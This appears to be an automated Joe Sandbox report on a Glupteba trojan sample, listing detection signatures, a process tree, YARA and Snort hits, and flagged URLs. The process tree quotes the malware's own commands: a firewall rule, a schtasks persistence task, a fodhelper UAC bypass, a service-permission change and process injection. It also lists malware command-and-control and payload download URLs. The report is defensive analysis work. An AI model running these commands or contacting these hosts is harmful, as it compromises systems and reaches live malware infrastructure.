Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kdsyitkxmS.exe

Overview

General Information

Sample Name:kdsyitkxmS.exe
Analysis ID:877005
MD5:01fe6ba28d82175d35665b3eb6ed8cea
SHA1:45748a6d6474f470d44e848596e0e08bce674996
SHA256:626df082c2624d9530794881921094aa100fa0a805b1544112d5a07dbe12cbc2
Infos:

Detection

Glupteba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected Glupteba
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Machine Learning detection for sample
Creates files in the system32 config directory
Modifies the windows firewall
Performs DNS TXT record lookups
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Uses STUN server to do NAT traversial
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Enables security privileges
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • svchost.exe (PID: 7872 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: F586835082F632DC8D9404D83BC16316)
  • kdsyitkxmS.exe (PID: 4688 cmdline: C:\Users\user\Desktop\kdsyitkxmS.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
    • powershell.exe (PID: 8304 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • kdsyitkxmS.exe (PID: 8716 cmdline: C:\Users\user\Desktop\kdsyitkxmS.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
      • powershell.exe (PID: 8848 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 9108 cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • netsh.exe (PID: 9168 cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • powershell.exe (PID: 9200 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 9208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8380 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csrss.exe (PID: 2532 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
        • powershell.exe (PID: 5432 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 1388 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 796B784E98008854C27F4B18D287BA30)
          • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 5008 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 796B784E98008854C27F4B18D287BA30)
          • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 2372 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 2736 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mountvol.exe (PID: 7316 cmdline: mountvol B: /s MD5: E0B3FFF7584298E77DFFB50796839FED)
          • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mountvol.exe (PID: 7668 cmdline: mountvol B: /d MD5: E0B3FFF7584298E77DFFB50796839FED)
          • conhost.exe (PID: 8296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mountvol.exe (PID: 1096 cmdline: mountvol B: /s MD5: E0B3FFF7584298E77DFFB50796839FED)
          • conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mountvol.exe (PID: 4896 cmdline: mountvol B: /d MD5: E0B3FFF7584298E77DFFB50796839FED)
          • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • injector.exe (PID: 5412 cmdline: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll MD5: D98E33B66343E7C96158444127A117F6)
          • conhost.exe (PID: 2900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • shutdown.exe (PID: 5092 cmdline: shutdown -r -t 5 MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
          • conhost.exe (PID: 3308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 9044 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 796B784E98008854C27F4B18D287BA30)
          • conhost.exe (PID: 9052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • cmd.exe (PID: 7312 cmdline: cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • sc.exe (PID: 8944 cmdline: sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • proxy.exe (PID: 4736 cmdline: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466 MD5: 61275FE567B258A897943911C450E57E)
          • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 8044 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 796B784E98008854C27F4B18D287BA30)
          • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • TrustedInstaller.exe (PID: 8676 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: F14D860CAE05DBD10671623C76B5DE65)
  • csrss.exe (PID: 768 cmdline: "C:\Windows\rss\csrss.exe" MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
    • cmd.exe (PID: 5000 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • fodhelper.exe (PID: 3488 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 3460 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 4112 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • csrss.exe (PID: 7048 cmdline: "C:\Windows\rss\csrss.exe" MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
          • powershell.exe (PID: 7932 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • csrss.exe (PID: 6892 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
            • powershell.exe (PID: 6628 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • csrss.exe (PID: 8952 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
    • powershell.exe (PID: 8904 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • csrss.exe (PID: 8552 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
      • powershell.exe (PID: 1356 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • csrss.exe (PID: 9120 cmdline: "C:\Windows\rss\csrss.exe" MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
    • cmd.exe (PID: 7108 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • fodhelper.exe (PID: 7384 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 8408 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 8324 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • csrss.exe (PID: 7120 cmdline: "C:\Windows\rss\csrss.exe" MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
          • powershell.exe (PID: 5632 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • csrss.exe (PID: 4840 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
            • powershell.exe (PID: 2332 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tor.exe (PID: 6028 cmdline: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt MD5: 055AE7C584A7B012955BF5D874F30CFA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
    00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
      0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmpSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth (Nextron Systems)
      • 0x3b7997:$x1: https://cdn.discordapp.com/attachments/
      0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
        0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmpSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth (Nextron Systems)
        • 0x3b7997:$x1: https://cdn.discordapp.com/attachments/
        Click to see the 25 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        58.3.csrss.exe.4331420.6.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth (Nextron Systems)
        • 0x29b38:$s2: The Magic Word!
        • 0x35c78:$s2: The Magic Word!
        • 0x29e98:$s3: Software\Oracle\VirtualBox
        • 0x29b27:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        61.3.csrss.exe.4331420.0.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth (Nextron Systems)
        • 0x29b38:$s2: The Magic Word!
        • 0x35c78:$s2: The Magic Word!
        • 0x29e98:$s3: Software\Oracle\VirtualBox
        • 0x29b27:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        10.3.kdsyitkxmS.exe.40e1420.6.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth (Nextron Systems)
        • 0x29b38:$s2: The Magic Word!
        • 0x35c78:$s2: The Magic Word!
        • 0x29e98:$s3: Software\Oracle\VirtualBox
        • 0x29b27:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        23.3.csrss.exe.4331420.1.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth (Nextron Systems)
        • 0x29b38:$s2: The Magic Word!
        • 0x35c78:$s2: The Magic Word!
        • 0x29e98:$s3: Software\Oracle\VirtualBox
        • 0x29b27:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        31.3.csrss.exe.431bb00.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth (Nextron Systems)
        • 0x3f458:$s2: The Magic Word!
        • 0x4b598:$s2: The Magic Word!
        • 0x3f7b8:$s3: Software\Oracle\VirtualBox
        • 0x3f447:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        Click to see the 22 entries

        Sigma Signatures

        Persistence and Installation Behavior

        barindex
        Sigma detected: Schedule system process
        Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe, ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 2532, ParentProcessName: csrss.exe, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, ProcessId: 1388, ProcessName: schtasks.exe

        Snort Signatures

        Timestamp:192.168.11.201.1.1.149827532045697 05/28/23-11:32:14.790696
        SID:2045697
        Source Port:49827
        Destination Port:53
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.82.216.50500074432043048 05/28/23-11:34:14.938480
        SID:2043048
        Source Port:50007
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.201.1.1.163997532045697 05/28/23-11:37:15.634598
        SID:2045697
        Source Port:63997
        Destination Port:53
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.82.216.50499934432043048 05/28/23-11:32:15.763358
        SID:2043048
        Source Port:49993
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.82.216.50499904432043048 05/28/23-11:32:14.520098
        SID:2043048
        Source Port:49990
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.82.216.50499984432043048 05/28/23-11:32:24.457669
        SID:2043048
        Source Port:49998
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.82.216.50500024432043048 05/28/23-11:33:14.485129
        SID:2043048
        Source Port:50002
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: kdsyitkxmS.exeVirustotal: Detection: 31%Perma Link
        Source: kdsyitkxmS.exeReversingLabs: Detection: 32%
        Yara detected Glupteba
        Source: Yara matchFile source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
        Antivirus detection for URL or domain
        Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZAvira URL Cloud: Label: malware
        Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313dAvira URL Cloud: Label: malware
        Source: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031eAvira URL Cloud: Label: malware
        Source: https://duniadekho.barAvira URL Cloud: Label: malware
        Source: https://server5.duniadekho.bar/api/restriction-usH2Avira URL Cloud: Label: malware
        Source: https://twopixis.com/w/w-8-debug.exeAvira URL Cloud: Label: malware
        Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollAvira URL Cloud: Label: malware
        Source: https://twopixis.com/watchdogAvira URL Cloud: Label: malware
        Source: https://twopixis.com/watchdog/watchdog.exeAvira URL Cloud: Label: malware
        Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNPAvira URL Cloud: Label: malware
        Source: https://server5.duniadekho.bar/api/pollAvira URL Cloud: Label: malware
        Source: https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exeAvira URL Cloud: Label: malware
        Source: https://server5.duniadekho.bar/api/restriction-usAvira URL Cloud: Label: malware
        Source: https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exeAvira URL Cloud: Label: malware
        Source: https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exeAvira URL Cloud: Label: malware
        Source: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionAvira URL Cloud: Label: malware
        Source: https://twopixis.com/watchdog/watchdog.exeSETCONFAvira URL Cloud: Label: malware
        Source: https://server5.duniadekho.barAvira URL Cloud: Label: malware
        Source: https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581Avira URL Cloud: Label: malware
        Source: https://server5.duniadekho.bar/api/signature/Avira URL Cloud: Label: malware
        Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionAvira URL Cloud: Label: malware
        Source: https://twopixis.com/watchdog/watchdog.exeno-storeAvira URL Cloud: Label: malware
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeAvira: detection malicious, Label: TR/Agent.twerk
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllAvira: detection malicious, Label: TR/Redcap.gsjan
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllReversingLabs: Detection: 88%
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeReversingLabs: Detection: 92%
        Source: C:\Windows\rss\csrss.exeReversingLabs: Detection: 32%
        Machine Learning detection for sample
        Source: kdsyitkxmS.exeJoe Sandbox ML: detected

        Bitcoin Miner

        barindex
        Yara detected Glupteba
        Source: Yara matchFile source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
        Source: kdsyitkxmS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Windows\rss\csrss.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UninstallerJump to behavior
        Source: Binary string: System.Data.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
